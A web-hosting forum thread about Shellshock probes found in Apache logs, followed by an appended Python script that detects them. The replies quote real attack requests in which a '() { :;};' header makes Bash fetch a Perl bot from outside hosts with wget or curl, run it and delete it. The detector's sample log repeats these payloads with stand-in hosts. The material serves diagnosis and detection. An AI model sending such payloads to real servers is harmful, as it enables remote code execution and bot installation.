Looks like someone trying to upload files to the server

tank
Well-Known Member, Apr 12, 2011, Chicago, IL
cPanel Access Level: Root Administrator
I noticed this in my Apache error log.

Code:
[Tue Nov 11 17:42:53.073036 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Connecting to 209.20.86.222:80... 
[Tue Nov 11 17:42:53.135079 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: connected.
[Tue Nov 11 17:42:53.135164 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: HTTP request sent, awaiting response... 
[Tue Nov 11 17:42:53.197484 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 200 OK
[Tue Nov 11 17:42:53.197549 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Length: 7488 (7.3K) [text/plain]
[Tue Nov 11 17:42:53.197583 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Saving to: `/tmp/jack.jpg'
[Tue Nov 11 17:42:53.197596 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.197615 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:      0K ...
[Tue Nov 11 17:42:53.259697 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: ....                  
[Tue Nov 11 17:42:53.259778 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:                              100%  118K=0.06s
[Tue Nov 11 17:42:53.259793 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.260010 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 2014-11-11 17:42:53 (118 KB/s) - `/tmp/jack.jpg' saved [7488/7488]
[Tue Nov 11 17:42:53.260030 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.264777 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.264817 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: curl: (3)  malformed
[Tue Nov 11 17:42:53.327853 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
[Tue Nov 11 17:42:53.328035 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:                                  Dload  Upload   Total   Spent    Left  Speed
[Tue Nov 11 17:42:53.328119 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
[Tue Nov 11 17:42:53.453541 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r101  7488
[Tue Nov 11 17:42:53.453691 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:   101  7488    0     0  39691      0 --:--:-- --:--:-- --:--:-- 59904
I looked for this file that was uploaded but could not find it.

How do I disable this, and/or what is this?

24x7server
Well-Known Member, Apr 17, 2013, India
cPanel Access Level: Root Administrator

malk315
Registered, Nov 13, 2014
cPanel Access Level: Website Owner
This looks like a Shellshock attack attempt. It tried to download jack.jpg from a server in Germany and run it (it is a Perl script), which then sets up some type of bot that may be controlled through IRC or something. I cleaned one up and updated Bash recently.

Log:

Code:
165.233.46.204 - - [03/Nov/2014:11:36:19 -0500] "GET / HTTP/1.1" 302 287 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget www.freistilreisen.de/jack.jpg -O /tmp/jack.jpg;curl -O /tmp/jack.jpg www.freistilreisen.de/jack.jpg;perl /tmp/jack.jpg;rm -rf /tmp/jack.jpg*\");'"
Here's another one:

Code:
81.145.204.4 - - [18/Oct/2014:07:16:45 -0400] "GET /cgi-bin/bin/view/TWiki/WebHome HTTP/1.1" 302 317 "() { :;}; /bin/bash -c \\x22cd /tmp;wget  http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf /tmp/lifesux.txt\\x22" "() { :;}; /bin/bash -c \\x22cd /tmp;wget http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf  lifesux.txt\\x22"
The telltale sign that a request is trying to exploit the Shellshock vulnerability in your Bash shell is the function definition at the beginning:

Code:
() { :; }
If you have an old version of Bash, update; you might need to build from source unless your box is really new.

There are lots of good sites out there that explain how to deal w/ shellshock.
I found this one quite helpful:

https://shellshocker.net/

Good luck.
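As an added example that is not part of the original thread, the following Python script puts the "telltale sign" above into a log check: it parses Apache combined-format access-log lines, looks for the `() {` function-definition marker in the request line, the Referer and the User-Agent, undoes Apache's log escaping so the payload reads the way the attacker sent it, and pulls out the hosts the payload downloads from and the files it drops under /tmp so they can be blocked and checked. The sample log lines, the 192.0.2.x and 198.51.100.x addresses and the bad.example.net hostname are constructed stand-ins modelled on the two entries quoted above; the marker regex is deliberately wider than `() { :; }` so it also flags variants such as `() { ignored; }`.

```python
"""Flag Shellshock (CVE-2014-6271) probes in Apache access-log lines.

Added example, not code from the forum thread. The log lines, hosts and
addresses below are constructed (RFC 5737 ranges, example.net), modelled
on the real entries quoted in the thread.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Apache "combined" LogFormat. Quoted fields may contain \" and \\ (Apache
# escapes them), so each field is "anything except an unescaped quote".
_Q = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + _Q + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + _Q + r')" "(?P<agent>' + _Q + r')"\s*$'
)

# A header value that opens with an empty function definition "() {" is the
# Shellshock marker; this also catches variants such as "() { ignored; }".
SHELLSHOCK_MARKER = re.compile(r'\(\)\s*\{')
CHECKED_FIELDS = ("request", "referer", "agent")

# Download sources named in the payload (IPv4 or hostname, with or without a
# scheme; a hostname must not be a path component) and files dropped in /tmp.
HOST_RE = re.compile(
    r'(?:https?://|(?<![/\w.-]))'
    r'((?:\d{1,3}\.){3}\d{1,3}|[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})',
    re.IGNORECASE,
)
DROP_PATH_RE = re.compile(r'/tmp/[\w.-]+')


def unescape_log_field(s: str) -> str:
    # Undo Apache's log escaping: \" -> ", \\ -> \, \xNN -> the byte NN.
    def repl(m: "re.Match[str]") -> str:
        esc = m.group(1)
        return chr(int(esc[1:], 16)) if esc[0] == "x" and len(esc) == 3 else esc
    return re.sub(r'\\(x[0-9a-fA-F]{2}|.)', repl, s)


@dataclass
class Hit:
    client: str
    time: str
    fields: Tuple[str, ...]   # which request fields carried the marker
    payload: str              # unescaped payload from the first carrier
    download_hosts: List[str]
    dropped_files: List[str]


def scan_log(text: str) -> List[Hit]:
    """Return one Hit per combined-format line carrying a Shellshock marker."""
    hits: List[Hit] = []
    for line in text.splitlines():
        m = COMBINED_RE.match(line.strip())
        if not m:
            continue  # blank line or not combined format
        rec = m.groupdict()
        carriers = tuple(f for f in CHECKED_FIELDS if SHELLSHOCK_MARKER.search(rec[f]))
        if not carriers:
            continue
        payload = unescape_log_field(rec[carriers[0]])
        hits.append(Hit(
            client=rec["host"],
            time=rec["time"],
            fields=carriers,
            payload=payload,
            download_hosts=sorted(set(HOST_RE.findall(payload))),
            dropped_files=sorted(set(DROP_PATH_RE.findall(payload))),
        ))
    return hits


# Constructed sample: two probes shaped like the ones quoted in the thread plus
# one benign request. Addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = r'''
192.0.2.10 - - [03/Nov/2014:11:36:19 -0500] "GET / HTTP/1.1" 302 287 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget bad.example.net/jack.jpg -O /tmp/jack.jpg;curl -O /tmp/jack.jpg bad.example.net/jack.jpg;perl /tmp/jack.jpg;rm -rf /tmp/jack.jpg*\");'"
192.0.2.11 - - [18/Oct/2014:07:16:45 -0400] "GET /cgi-bin/bin/view/TWiki/WebHome HTTP/1.1" 302 317 "() { :;}; /bin/bash -c \\x22cd /tmp;wget http://198.51.100.7/lifesux.txt;perl /tmp/lifesux.txt;rm -rf /tmp/lifesux.txt\\x22" "() { :;}; /bin/bash -c \\x22cd /tmp;wget http://198.51.100.7/lifesux.txt;perl /tmp/lifesux.txt;rm -rf lifesux.txt\\x22"
192.0.2.12 - - [11/Nov/2014:17:42:52 -0600] "GET /index.html HTTP/1.1" 200 1024 "http://www.example.com/" "Mozilla/5.0 (X11; Linux x86_64)"
'''

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h.time} {h.client} via {'+'.join(h.fields)}: "
              f"fetches from {h.download_hosts}, drops {h.dropped_files}")
        print("   ", h.payload)
```

Feed `scan_log` the contents of your real access log to get the same report. A hit only proves an attempt; whether it succeeded depends on a CGI script having run under an unpatched Bash. The `cgi:error ... AH01215` lines in the first post are what success looks like: AH01215 is stderr from a CGI process, so the wget progress output and the curl error (curl exit code 3 is "URL malformed", which is what `curl -O /tmp/jack.jpg` produces because `-O` takes no argument) were written by the payload itself. If you see that, check /tmp for the dropped file, look for the spawned Perl process, and patch Bash before cleaning up.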